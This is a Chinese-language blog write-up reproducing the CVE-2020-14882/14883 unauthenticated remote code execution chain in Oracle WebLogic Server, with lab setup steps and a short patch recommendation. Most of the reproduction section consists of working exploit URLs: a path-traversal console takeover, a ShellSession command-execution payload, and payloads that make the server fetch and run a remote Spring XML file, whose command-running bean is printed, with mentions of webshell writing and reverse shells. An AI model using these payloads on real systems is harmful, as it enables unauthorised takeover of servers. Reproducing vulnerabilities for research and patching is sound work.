0x01 前言
远程代码执行漏洞 (CVE-2020-14882)POC 已被公开,未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。
2、影响版本:
Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
3、漏洞链接:
/console/images/%252E%252E%252Fconsole.portal
4、环境准备
jdk1.8.0_171
fmw_12.2.1.4.0_wls_lite_generic.jar
5、相应环境工具包获取方法
关注公众号回复“Weblogic_14882”自行下载
0x02 环境搭建
1)weblogic安装
用管理员权限运行
java -jar fmw_12.2.1.4.0_wls_lite_generic.jar遇到的第一个问题(图片来源于网络,自己的没有截图)
此安装程序必须使用 Java 开发工具包 (JDK) 执行, 但 C:Program FilesJavajre1.8.0_172 不是有效的 JDK Java 主目录。
解决办法:
先进入你电脑已安装好的jdk bin目录下 然后java -jar 执行你的jar包就可以了
之后会是这个酱紫(这部分傻瓜式安装)
2)创建域
全部勾选
设置账号密码完了选择生产
高级配置:全部选中
设置端口号--->填写账号密码--->一直下一步
在这创建
等待一会继续下一步----->OK!!
3、启动Weblogic
C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domain找到startWebLogic.cmd点击启动
启动后输入之前设置的账号密码,访问地址如下表示启动成功:
http://192.168.142.132:7001/console
0x03 漏洞复现
构造PoC,可以直接未授权接管后台:
http://192.168.142.132:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29
命令执行----->疯狂弹计算器
http://192.168.142.132:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
通过FileSystemXmlApplicationContext()加载并执行远端xml文件:
http://192.168.142.132:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://xx.x.xx.x/111.xml")PoC代码:
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb" class="java.lang.ProcessBuilder" init-method="start"><constructor-arg><list><value>cmd</value><value>/c</value><value><![CDATA[calc]]></value></list></constructor-arg></bean></beans>
通过此方法,windows可以往images路径下写文件,写入路径为:
../../../wlserver/server/lib/consoleapp/webapp/images/xxx.jsp
Linux下可直接反弹shell:(修改相应的命令就可以)
通过ClassPathXmlApplicationContext()也可以达到相同的效果:
http://192.168.142.132:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://1.x.x.x/111.xml")
0x04 修复建议
安装官方最新补丁进行升级:
https://www.oracle.com/security-alerts/cpuapr2020.html
0x05 参考链接
https://mp.weixin.qq.com/s?__biz=MzkwNzEzMTg3MQ==&mid=2247483846&idx=1&sn=8dd2b7770663e3458117e888208f7f56&chksm=c0dcaf76f7ab266016a6fe868f655ffe75658fa127d223b24a1efe55e056d76a3a600d8858c7&mpshare=1&scene=1&srcid=1102ywVU1T9jszU6Ob0QVVEd&sharer_sharetime=1604285148881&sharer_shareid=9dc1efbf8ece2cc4df398706cc9ecfdb&key=e3bce42fc7df4344d65d653594e1f68103b10177a8895a4a8eb8a02e54849be73c323f4b70cc74487913bdf79dc7a301023bf30bb9f7926f11c897265b64b1ff5ef019c5c67026d4e92176a5e331823bce1e62381b911e2521982e632b770bcd5f671a3d582cbd925c301205c84878cbb22c4c1e1d313925c48c0f1899695d01&ascene=1&uin=MTQ2MTgwODgyNQ%3D%3D&devicetype=Windows+10+x64&version=6300002f&lang=zh_CN&exportkey=AzUNt%2FD5nS1aMRRmh9Ktu8s%3D&pass_ticket=9MsGm%2BS%2FHqh9sqwul2tehaexdZX1X0vuBaa%2F1tUF9hYzG1Aln%2Ba8C9BBEuucM48A&wx_header=0https://mp.weixin.qq.com/s?__biz=Mzg3MDE5OTIwNw==&mid=2247486185&idx=1&sn=6376f69f496f3458c1e6a9de3be5ed68&chksm=ce903021f9e7b9372c5bbc2cde98e9a607bdc915630c55fec8553debf78033a35575b199f386&mpshare=1&scene=1&srcid=1102YvHDsoy2PpA7jHmFG3QJ&sharer_sharetime=1604279921871&sharer_shareid=9dc1efbf8ece2cc4df398706cc9ecfdb&key=dab8500b28863cd492aad5409edcdd03897b62f8571f08da13f3ac74bc095b8d8029239bde2316cafed94155e3d8bc1515e72568e0e2f45dd215fcfefc4fbd597db345e82093639bd2c22b251e802f52526002de2df7f959538a0a9ccc94e919bf4f497e678c4b6efa5aaea5f799f8fe5bcb4c0baa62b18ea12f592308636e4d&ascene=1&uin=MTQ2MTgwODgyNQ%3D%3D&devicetype=Windows+10+x64&version=6300002f&lang=zh_CN&exportkey=A%2BPzCdeFOCXfBMEe5uv1Xsg%3D&pass_ticket=9MsGm%2BS%2FHqh9sqwul2tehaexdZX1X0vuBaa%2F1tUF9hYzG1Aln%2Ba8C9BBEuucM48A&wx_header=0https://blog.csdn.net/qq_37798548/article/details/90255995
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦
如果对你有所帮助,点个分享、赞、在看呗!
本文始发于微信公众号(爱国小白帽):【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论